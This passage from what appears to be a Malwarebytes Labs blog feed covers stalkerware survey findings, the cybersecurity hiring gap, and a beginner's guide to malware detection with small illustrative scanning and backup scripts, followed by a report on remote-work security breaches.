“Only the Find My iPhone app. My wife is out running or hiking by herself quite often and she knows I want to know if she is safe.”

Of the 81 people who said they use apps to monitor their partners’ phones, only nine cited issues of trust, cheating, “being lied to” or “change in partner’s behavior.” Of those nine, two said their partner agreed to install the app.

NortonLifeLock’s online creeping study

The results of the Labs stalkerware survey are especially interesting when compared to the Online Creeping Survey conducted by NortonLifeLock, another founding member of the Coalition Against Stalkerware.

This survey of more than 2,000 adults in the United States found that 46 percent of respondents admitted to “stalking” an ex or current partner online “by checking in on them without their knowledge or consent.”

Twenty-nine percent of those surveyed admitted to checking a current or former partner’s phone. Twenty-one percent admitted to looking through a partner’s search history on one of their devices without permission. Nine percent admitted to creating a fake social media profile to check in on their partners.

When compared to the Labs stalkerware survey, it would seem that online stalking is considered more acceptable when couched under the term “checking in.” For perspective, if one were to swap the word “diary” for “phone,” we don’t think too many people would feel comfortable admitting, “Hey, I’m just ‘checking in’ on my girlfriend/wife’s diary. No big deal.”

Stalkerware in a pandemic

Finally, we can’t end this piece without at least acknowledging the strange and scary times we’re living in. Shelter-in-place orders at the start of the coronavirus pandemic became de facto jail sentences for stalkerware and domestic violence victims, imprisoning them with their abusers. No surprise, The New York Times reported an increase in the number of domestic violence victims seeking help since March.

For some users, however, the pandemic has brought on a different kind of suffering. One survey respondent best summed up the current malaise of anxiety, fear, and depression: 

“No partner to monitor lol.”

We like to think, dear reader, that they’re not laughing at themselves and the challenges of finding a partner during COVID. Rather, they’re laughing at all of us.

Stalkerware resources

As mentioned earlier, Malwarebytes for Windows, Mac, or Android will detect and let users remove stalkerware-type applications. And if you think you might have stalkerware on your mobile device, be sure to check out our article on what to do when you find stalkerware or suspect you’re the victim of stalkerware.

Here are a few other important reads on stalkerware:

Stalkerware and online stalking are accepted by Americans. Why?

Stalkerware’s legal enforcement problem

Awareness of stalkerware, monitoring apps, and spyware on the rise

How to protect against stalkerware


The cybersecurity skills gap is misunderstood

Nearly every year, a trade association, a university, an independent researcher, or a large corporation—and sometimes all of them and many in between—push out the latest research on the cybersecurity skills gap: the now decade-plus-old idea that the global economy faces a large and growing shortage of cybersecurity professionals who simply cannot be found.

It is, as one report said, a “state of emergency.” It would be nice, then, if the numbers made more sense.

In 2010, according to one study focused on the United States, the cybersecurity skills gap included at least 10,000 individuals. In 2015, according to a separate analysis, that number was 209,000. Also, in 2015, according to yet another report, that number was more than 1 million. Today, that number is both a projected 3.5 million by 2021 and a current 4.07 million, worldwide.

PK Agarwal, dean of the University of California Santa Cruz Silicon Valley Extension, has followed these numbers for years. He followed the data out of personal interest, and he followed it more deeply when building programs at Northeastern University Silicon Valley, the educational hub opened by the private Boston-based university, where he most recently served as regional dean and CEO. During his research, he uncovered something.

“In terms of actual numbers, if you’re looking at the supply and demand gap in cybersecurity, you’ll see tons of reports,” Agarwal said. “They’ll be all over the map.”

He continued: “Yes, there is a shortage, but it is not a systemic shortage. It is in certain sweet spots. That’s the reality. That’s the actual truth.”

Like Agarwal said, there are “sweet spots” of truth to the cybersecurity skills gap—there can be difficulty filling an immediate need on a deadline-driven project, or finding professionals trained in a crucial software tool that a company cannot spend time training current employees on.

But more broadly, the cybersecurity skills gap, according to recruiters, hiring managers, and academics, is misunderstood. Rather than a lack of talent, there is sometimes, on behalf of companies, a lack of understanding in how to find and hire that talent.

By posting overly restrictive job requirements, demanding contradictory skillsets, refusing to hire remote workers, offering non-competitive rates, and failing to see minorities, women, and veterans as viable candidates, businesses could miss out on the very real, very accessible cybersecurity talent out there.

In other words, if you are not able to find a cybersecurity expert for your company, that doesn’t mean they don’t exist. It means you might need help in finding them.

Number games

In 2010, the Center for Strategic & International Studies (CSIS) released its report “A Human Capital Crisis in Cybersecurity.” According to the paper, “the cyber threat to the United States affects all aspects of society, business, and government, but there is neither a broad cadre of cyber experts nor an established cyber career field to build upon, particularly within the Federal government.”

Further, according to Jim Gosler, a then-visiting NSA scientist and the founding director of the CIA’s Clandestine Information Technology Office, only 1,000 security experts were available in the US with the “specialized skills to operate effectively in cyberspace.” The country, Gosler said in interviews, needed 10,000 to 30,000.

Though the cybersecurity skills gap was likely spotted before 2010, the CSIS paper partly captures a theory that draws support today—that the skills gap is a lack of talent.

Years later, the cybersecurity skills gap reportedly grew into a chasm. It would soon span the world.  

In 2016, the Enterprise Strategy Group called the cybersecurity skills gap a “state of emergency,” unveiling research that showed that 46 percent of senior IT and cybersecurity professionals at midmarket and enterprise companies described their departments’ lack of cybersecurity skills as “problematic.” The same year, separate data compiled by the professional IT association ISACA predicted that the entire world would be short 2 million cybersecurity professionals by the year 2019.

But by 2019, that prediction had already come true, according to a survey published that year by the International Information System Security Certification Consortium, or (ISC)2. The world, the group said, employed 2.8 million cybersecurity professionals, but it needed 4.07 million.

At the same time, a recent study projected that the skills gap in 2021 would be lower than the (ISC)2 estimate for today—instead predicting a need of 3.5 million professionals by next year. Throughout the years, separate studies have offered similarly conflicting numbers.

The variation can be dizzying, but it can be explained by a variation in motivations, said Agarwal. He said these reports do not exist in a vacuum, but are rather drawn up for companies and, perhaps unsurprisingly, for major universities, which rely on this data to help create new programs and to develop curriculum to attract current and prospective students.

It’s a path Agarwal went down years ago when developing a Master’s program in computer science at Northeastern University Silicon Valley extension. The data, he said, supported the program, showing some 14,000 Bay Area jobs that listed a Master’s degree as a requirement, while neighboring Bay Area schools were only on track to produce fewer than 500 Master’s graduates that year.

“There was a massive gap, so we launched the campus,” Agarwal said. The program garnered interest, but not as much as the data suggested.

Agarwal remembered thinking at the time: “What the hell is going on?” 

It turns out, a lot was going on, Agarwal said. For many students, the prospect of more student debt for a potentially higher pay was not enough to get them into the program. Further, the salaries for Bachelor’s graduates and Master’s graduates were close enough that students had a difficult time seeing the value in getting the advanced degree.

That wariness towards a Master’s degree in computer science also plagues cybersecurity education today, Agarwal said, comparing it to an advanced degree in Biology.

“Cybersecurity at the Master’s level is about the same as in Biology—it has no market value,” Agarwal said. “If you have a BA [in Biology], you’re a lab rat. If you have an MA, you’re a senior lab rat.”

So, imagine the confusion for cybersecurity candidates who, when applying for jobs, find Master’s degrees listed as requirements. And yet, that is far from uncommon. The requirement, like many others, can drive candidates away.

Searching different

For companies that feel like the cybersecurity talent they need simply does not exist, recruiters and strategists have different advice: Look for cybersecurity talent in a different way. That means more lenient degree and certification requirements, more openness to working remotely, and hiring for the aptitude of a candidate, rather than going down a must-have wish list.

Jim Johnson, senior vice president and Chief Technology Officer for the international recruiting agency Robert Half, said that, when he thinks about client needs in cybersecurity, he often recalls a conference panel he watched years ago. A panel of hiring experts, Johnson said, was asked a simple question: How do you find people?

One person, Johnson recalled, said “You need to be okay hiring people who know nothing.”

The lesson, Johnson said, was that companies should hire for aptitude and the ability to learn.

“You hire the personality that fits what you’re looking for,” Johnson said. “If they don’t have everything technically, but they’re a shoo-in for being able to learn it, that’s the person you bring up.”

Johnson also explained that, for some candidates, restrictive job requirements can actually scare them away. Johnson’s advice for companies is that they understand what they’re looking for, but they don’t make the requirements for the job itself so restrictive that it causes hesitation for some potential candidates.

“You might miss a great hire because you required three certifications and they had one, or they’re in the process of getting one,” Johnson said.

Similarly, Thomas Kranz, a longtime cybersecurity consultant and current cybersecurity strategy adviser for organizations, called job requirements that specifically demand degrees “the biggest barrier companies face when trying to hire cybersecurity talent.”

“This is an attitude that belongs firmly in the last century,” Kranz wrote. “‘Must have a [Bachelor of Science] or advanced degree’ goes hand in hand with ‘Why can’t we find the candidates we need?’”

This thinking has caught on beyond the world of recruiters.

In February, more than a dozen companies, including Malwarebytes, pledged to adopt the Aspen Institute’s “Principles for Growing and Sustaining the Nation’s Cybersecurity Workforce.”

The very first principle requires companies to “widen the aperture of candidate pipelines, including expanding recruitment focus beyond applicants with four-year degrees or using non-gender biased job descriptions.”

At Malwarebytes, the practice of removing strict degree requirements from cybersecurity job descriptions has been in place for cybersecurity hires for at least a year and a half.

“I will never list a BA or BS as a hard requirement for most positions,” said Malwarebytes Chief Information Security Officer John Donovan. “Work and life experience help to round out candidates, especially for cybersecurity roles.” Donovan added that, for more junior positions, there are “creative ways to broaden the applicant pool,” such as using the recruiting programs YearUp, NPower, and others.

The two organizations, like many others, help transition individuals to tech-focused careers, offering training classes, internships, and access to a corporate world that was perhaps beyond reach.

These types of career development groups can also help a company looking to broaden its search to include typically overlooked communities, including minorities, women, disabled people, and veterans.

Take, for example, the International Consortium of Minority Cybersecurity Professionals, which creates opportunities for women and minorities to advance in the field, or the nonprofit Women in CyberSecurity (WiCyS), which recently developed a veterans’ program. WiCyS primarily works to cultivate the careers of women in cybersecurity by offering training sessions, providing mentorship, granting scholarships, and working with interested corporate partners.

“In cybersecurity, there are challenges that have never existed before,” said Lynn Dohm, executive director for WiCyS. “We need multitasking, diversity of thought, and people from all different backgrounds, all genders, and all ethnicities to tackle these challenges from all different perspectives.”

Finally, for companies still having trouble finding cybersecurity talent, Robert Half’s Johnson recommended broadening the search—literally. Cybersecurity jobs no longer need to be filled by someone located within a 40-mile radius, he said, and if anything, the current pandemic has reinforced this idea.

“The effect of the pandemic, which has shifted how people do their jobs, has made us now realize that the whole working remote thing isn’t as scary as we thought,” Johnson said.

But companies should understand that remote work is as much a boon to them as it is to potential candidates. Qualified candidates are no longer limited to jobs they can physically get to—now they can apply for more appealing roles that are much farther from where they live.

And that, of course, will have an impact on salary, Johnson said.

“While Bay Area salaries or a New York salary, while those might not change dramatically, what is changing is the folks that might be being recruited in Des Moines or in Omaha or Oklahoma City, who have traditionally been limited [regionally], now they’re being recruited by companies on the coast,” Johnson said.

“That’s affecting local companies, which are paying those $80,000 salaries. Now those candidates are being offered $85,000 to work remotely. Now I’ve got to compete with that.”

Planning ahead

The cybersecurity skills gap need not frighten a company or a senior cybersecurity manager looking to hire. There are many actionable steps a business can take today to broaden its search and find the talent that other companies are perhaps ignoring.

  • First, stop including hard degree requirements in job descriptions. The same goes for cybersecurity certifications.
  • Second, start accepting the idea of remote work for these teams. The value of “butts in seats” means next to nothing right now, so get used to it.
  • Third, understand that remote work means potentially better pay for the candidates you’re trying to hire, so look at the market data and pay appropriately.
  • Fourth, connect with a recruiting organization, like WiCyS, if you want some extra help in creating a diverse and representative team.
  • Fifth, consider looking inwards, as your next cybersecurity hire might actually be a cybersecurity promotion.

And the last piece of advice, at least according to Robert Half’s Johnson? Hire a recruiter.

The post The cybersecurity skills gap is misunderstood appeared first on Malwarebytes Labs.

A week in security (August 17 – 23)

Last week on Malwarebytes Labs, we looked at the impact of COVID-19 on healthcare cybersecurity, dug into some pandemic stats in terms of how workforces coped with going remote, and served up a crash course on malware detection. Our most recent Lock and Code podcast explored the safety of parental monitoring apps.

Stay safe, everyone!

The post A week in security (August 17 – 23) appeared first on Malwarebytes Labs.

‘Just tell me how to fix my computer:’ a crash course on malware detection

Malware. You’ve heard the term before, and you know it’s bad for your computer—like a computer virus. Which raises the question: Do the terms “malware” and “computer virus” mean the same thing? How do you know if your computer is infected with malware? Is “malware detection” just a fancy phrase for antivirus? For that matter, are anti-malware and antivirus programs the same? And let’s not forget about Apple and Android users, who are probably wondering if they need cybersecurity software at all.

This is the point where your head explodes.

All you want to do is get your work done, Zoom your friends/family, Instacart a bottle of wine, and stream a movie till you go to bed. But it’s during these everyday tasks that we let our guard down and are most susceptible to malware, which includes such cyberthreats as ransomware, Trojans, spyware, stalkerware, and, yes, viruses.

To add insult to injury, cybercriminals deliver malware using sneaky social engineering tricks, such as fooling people into opening email attachments that infect their computers or asking them to update their personal information on malicious websites pretending to be legitimate. Sounds awful, right? It sure is!

The good news is that staying safe online is actually fairly easy. All it takes is a little common sense, a basic understanding of how threats work, and a security program that can detect and protect against malware. Think of it like street smarts but for the Internet. With these three elements, you can safely avoid the majority of the dangers online today.

So, for the Luddites and the technologically challenged among our readership, this is your crash course on malware detection. In this article, we’ll answer all the questions you wish you didn’t have to ask, like:

  • What is malware?
  • How can I detect malware?
  • Is Windows Defender good enough?
  • Do Mac and mobile devices need anti-malware?
  • How do you remove malware?
  • How do you prevent malware infections?

What is malware?

Malware, or “malicious software,” is a catchall term that refers to any malicious program that is harmful to your devices. Targets for malware can include your laptop, tablet, mobile phone, and WiFi router. Even household items like smart TVs, smart fridges, and newer cars with lots of onboard technology can be vulnerable. Put it this way: If it connects to the Internet, there’s a chance it could be infected with malware.

There are many types of malware, but here’s a gloss on the more infamous and/or popular examples in rotation today.

Adware

Adware, or advertising-supported software, is software that displays unwanted advertising on your computer or mobile device. As stated in the Malwarebytes Labs 2020 State of Malware Report, adware is the most common threat to Windows, Mac, and Android devices today.

While it may not be considered as dangerous as some other forms of malware, such as ransomware, adware has become increasingly aggressive and malicious over the last couple years, redirecting users from their online searches to advertising-supported results, adding unnecessary toolbars to browsers, peppering screens with hard-to-close pop-up ads, and making it difficult for users to uninstall.

Computer virus

A computer virus is a form of malware that attaches itself to another program (such as a document) and, once a user runs it for the first time, can replicate and spread on its own. But computer viruses aren’t as prevalent as they once were. Cybercriminals today tend to focus their efforts on more lucrative threats like ransomware.

Trojan

A Trojan is a program that hides its true intentions, often appearing legitimate but actually conducting malicious business. There are many families of malware that can be considered Trojans, from information-stealers to banking Trojans that siphon off account credentials and money.

Once active on a system, a Trojan can quietly steal your personal info, spam other potential victims from your account, or even load other forms of malware. One of the more effective Trojans on the market today is called Emotet, which has evolved from a basic info-stealer to a tool for spreading other forms of malware to other systems—especially within business networks.

Ransomware

Ransomware is a type of malware that locks you out of your device and/or encrypts your files, then forces you to pay a ransom to get them back. Many high-profile attacks against businesses, schools, and local government agencies over the last four years have included ransomware of some kind. Some of the more notorious recent strains of ransomware include Ryuk, Sodinokibi, and WastedLocker.

How can I detect malware?

There are a few ways to spot malware on your device. It may be running slower than usual. You may have loads of ads bombarding your screen. Your files may be frozen or your battery life may drain faster than usual. Or there may be no sign of infection at all.

That’s why good malware detection starts with a good anti-malware program. For our purposes, “good” anti-malware is going to be a program that can detect and protect against any of the threats we’ve covered above and then some, including what’s known as zero-day or zero-hour exploits. These are new threats developed by cybercriminals to exploit vulnerabilities, or weaknesses in code, that have not yet been detected or fixed by the company that created them. (That’s why when companies do fix these vulnerabilities, they issue patches, or updates, and notify users immediately.)

Antivirus and other legacy cybersecurity software rely on something called signature-based detection in order to stop threats. Signature-based detection works by comparing every file on your computer against a list of known malware. Each threat carries a signature that functions much like a set of fingerprints. If your security program finds code on your computer that matches the signature of a known threat, it’ll isolate and remove the malicious program.

While signature-based detection can be effective for protecting against known threats, it is time-consuming and resource-intensive for your computer. To continue our fingerprint analogy, signature-based detection can only spot threats with an established rap sheet. Brand-new malware, zero-day, and zero-hour exploits are free to spread and cause damage until security researchers identify the threat and reverse-engineer it, adding its signature to an increasingly bloated database.
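For the curious, here’s a minimal sketch of how signature-based scanning works in principle: hash every file and look its fingerprint up in a database of known-bad signatures. The hash value and folder below are placeholders, not real malware signatures or any vendor’s actual implementation.

```python
# A toy signature-based scanner: hash each file and check it against a
# set of known-bad fingerprints. The hash here is a made-up placeholder.
import hashlib
from pathlib import Path

KNOWN_BAD_SHA256 = {
    "0f1e2d3c4b5a69788796a5b4c3d2e1f00112233445566778899aabbccddeeff",  # hypothetical
}

def sha256_of(path: Path) -> str:
    """Compute a file's SHA-256 fingerprint without loading it all at once."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def scan(folder: Path) -> list:
    """Return every file whose fingerprint matches a known-malware signature."""
    return [
        p for p in folder.rglob("*")
        if p.is_file() and sha256_of(p) in KNOWN_BAD_SHA256
    ]

if __name__ == "__main__":
    for hit in scan(Path.home() / "Downloads"):
        print(f"Known threat found: {hit}")
```

A real engine keeps millions of such signatures and must update them constantly, which is exactly the maintenance burden described above.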

This is where heuristic analysis comes in. Heuristic analysis relies on investigating a program’s behavior to determine whether a bit of computer code is malicious or not. In other words, if a program is acting like malware, it probably is malware. After demonstrating suspicious behavior, files are quarantined and can be manually or automatically removed—without having to add signatures to the database.
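To make the contrast concrete, here’s a minimal sketch of behavior-based scoring, the general idea behind heuristic analysis. The behaviors, weights, and threshold are illustrative assumptions, not how any particular anti-malware engine is actually tuned.

```python
# A toy heuristic: score suspicious behaviors observed while a program runs
# and flag anything that crosses a threshold. Weights are illustrative only.
SUSPICIOUS_BEHAVIORS = {
    "modifies_autorun_keys": 3,     # tries to persist across reboots
    "encrypts_user_documents": 5,   # classic ransomware behavior
    "disables_security_tools": 4,
    "contacts_unknown_server": 2,
}
QUARANTINE_THRESHOLD = 5

def looks_malicious(observed_behaviors) -> bool:
    """Flag a program whose combined behavior score crosses the threshold."""
    score = sum(SUSPICIOUS_BEHAVIORS.get(b, 0) for b in observed_behaviors)
    return score >= QUARANTINE_THRESHOLD

# A program that encrypts documents and kills security tools scores 9 and
# gets quarantined even if no signature for it exists yet.
print(looks_malicious({"encrypts_user_documents", "disables_security_tools"}))  # True
```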

The best anti-malware programs, then, can protect against new and emerging zero-day/zero-hour threats using heuristic analysis, as well as threats we already know about using traditional signature-based detection. If your antivirus or anti-malware relies on signature-based malware detection alone to keep your system safe—you’re not really safe.

Is Windows Defender good enough?

Maybe you’re using Windows Defender because your computer came with it preinstalled. It seems fine, but you’ve never looked at other options. Or maybe you have Windows Defender and your computer somehow got an infection anyway. Either way, here’s something to consider: Defender is one of the security programs most frequently targeted by cybercriminals. And there are whole categories of threats that Windows Defender doesn’t protect against.

The majority of threats detected today are found using signature-less technologies, and there are several other methods of malware detection that, when layered together, offer better protection than Windows Defender alone. Malwarebytes Premium, for example, uses a layered approach to threat detection that includes heuristic analysis technology as just one of its components. Other major components include ransomware protection and rollback, web protection, and anti-exploit technology.

Do Mac and mobile devices need anti-malware?

In 2019 for the first time ever, Macs outpaced Windows PCs in number of threats detected per endpoint. Over the last few years, Mac adware has exploded, debunking the myth that Macs are safe from cyberthreats. While Macs’ built-in AV blocks some malware, Mac adware has become so aggressive that it warrants extra anti-malware protection.

Meanwhile, Mac’s mobile counterpart, the iPhone, does not allow outside anti-malware programs to be downloaded. (Apple says its own built-in iOS protection is enough.) However, there are some privacy apps, web browser protection, and scam call blockers users can try for added safety.

As for Android, malware attacks from threats such as adware, monitoring apps, and other potentially unwanted programs (PUPs) are more common. At best, PUPs serve up annoying ads you can’t get rid of. At worst, they’ll discreetly steal information from your phone.

Also, because the Android environment allows for third-party downloads, it’s a bit more vulnerable to malware and PUPs than the iPhone. So we recommend a good anti-malware solution for your Android device as well.

How can I remove malware?

Malware detection is the important first step for any cybersecurity solution. But what happens next? If you get a malware infection on one of your devices, the good news is you can easily remove it. The process of identifying and removing cyberthreats from your computer systems is called “remediation.”

To conduct a thorough remediation of your device, download an anti-malware program and run a scan. Before doing so, make sure you back up your files. Afterwards, change all of your account passwords in case they were compromised in the malware attack. And if you’re dealing with a tough infection, you’re in luck: Malwarebytes has a rock-solid reputation for removing malware that other programs can’t even detect, let alone remove.

If you need to clean an infected computer now, download Malwarebytes for free, review these tips for remediation, and run a scan to see which threats are hiding on your devices.

How do I protect against malware?

Yes, it’s possible to clean up an infected computer and fully remove malware from your system. But the damage from some forms of malware, like ransomware, cannot be undone. If it’s encrypted your files and you haven’t backed them up, the jig is up. So your best defense is to beat the bad guys at their own game—by preventing infection in the first place.

There are a few ways to do this. Keeping all devices updated with the latest software patches will block threats designed to exploit older vulnerabilities. Automating backups of files to an encrypted cloud storage platform won’t protect against ransomware attacks, but it will ensure that you needn’t pay the ransom to retrieve your files. Training on cybersecurity best practices, including how to spot a phishing attack, tech support scam, or other social engineering technique, also helps keep those threats at bay.
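As one example of that middle step, here’s a minimal sketch of automating a backup to encrypted cloud storage, assuming an Amazon S3 bucket and the boto3 library; the folder path and bucket name are placeholders, and a scheduler such as cron or Task Scheduler would run the script daily.

```python
# A toy backup job: bundle a folder into a dated archive and upload it to
# cloud storage with encryption at rest. Paths and bucket name are placeholders.
import datetime
import shutil

import boto3  # AWS SDK for Python; other cloud storage SDKs work similarly

DOCUMENTS_FOLDER = "/home/student/Documents"   # folder to protect (placeholder)
BACKUP_BUCKET = "family-backups-example"       # hypothetical S3 bucket name

def backup_documents() -> None:
    # Create an archive named like backup-2020-08-24.zip
    stamp = datetime.date.today().isoformat()
    archive_path = shutil.make_archive(f"backup-{stamp}", "zip", DOCUMENTS_FOLDER)

    # Upload the archive and ask the storage service to encrypt it at rest.
    boto3.client("s3").upload_file(
        archive_path,
        BACKUP_BUCKET,
        f"backups/backup-{stamp}.zip",
        ExtraArgs={"ServerSideEncryption": "AES256"},
    )

if __name__ == "__main__":
    backup_documents()
```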

However, the best way to prevent malware infection is to use an antivirus/anti-malware program with layered protection that stops a wide range of cyberthreats in real time—whether it’s a malicious website or a brand-new malware family never before seen “in the wild.”

But if you have antivirus already and threats are getting through, maybe it’s time to move on to a program that’ll “just fix your computer” so you can stop worrying about malware detection and start…participating in distance learning classes? Ordering groceries? Having your virtual doctor’s appointment? Developing a vaccine? Literally anything else.

The post ‘Just tell me how to fix my computer:’ a crash course on malware detection appeared first on Malwarebytes Labs.

20 percent of organizations experienced breach due to remote worker, Labs report reveals

It is no surprise that moving to a fully remote work environment due to COVID-19 would cause a number of changes in organizations’ approaches to cybersecurity. What has been surprising, however, are some of the unanticipated shifts in employee habits and how they have impacted the security posture of businesses large and small.

Our latest Malwarebytes Labs report, Enduring from Home: COVID-19’s Impact on Business Security, reveals some unexpected data about security concerns with today’s remote workforce.

Our report combines Malwarebytes product telemetry with survey results from 200 IT and cybersecurity decision makers from small businesses to large enterprises, unearthing new security concerns that surfaced after the pandemic forced US businesses to send their workers home.

The data showed that since organizations moved to a work from home (WFH) model, the potential for cyberattacks and breaches has increased. While this isn’t entirely unexpected, the magnitude of this increase is surprising. Since the start of the pandemic, 20 percent of respondents said they faced a security breach as a result of a remote worker. This in turn has increased costs, with 24 percent of respondents saying they paid unexpected expenses to address a cybersecurity breach or malware attack following shelter-in-place orders.

We noticed a stark increase in the use of personal devices for work: 28 percent of respondents admitted they’re using personal devices for work-related activities more than their work-issued devices. Beyond that, we found that 61 percent of respondents’ organizations did not urge employees to use antivirus solutions on their personal devices, further compounding the increase in attack surface with a lack of adequate protection.

We found a startling contrast between the IT leaders’ confidence in their security during the transition to work from home (WFH) environments, and their actual security postures, demonstrating a continued problem of security hubris. Roughly three quarters (73.2 percent) of our survey respondents gave their organizations a score of 7 or above on preparedness for the transition to WFH, yet 45 percent of respondents’ organizations did not perform security and online privacy analyses of necessary software tools for WFH collaboration.

Additional report takeaways

  • 18 percent of respondents admitted that, for their employees, cybersecurity was not a priority, while 5 percent said their employees were a security risk and oblivious to security best practices.
  • At the same time, 44 percent of respondents’ organizations did not provide cybersecurity training that focused on potential threats of working from home (like ensuring home networks had strong passwords, or devices were not left within reach of non-authorized users).
  • While 61 percent of respondents’ organizations provided work-issued devices to employees as needed, 65 percent did not deploy a new antivirus (AV) solution for those same devices.

To learn more about the increasing risks uncovered in today’s remote workforce population, read our full report:

Enduring from Home: COVID-19’s Impact on Business Security

The post 20 percent of organizations experienced breach due to remote worker, Labs report reveals appeared first on Malwarebytes Labs.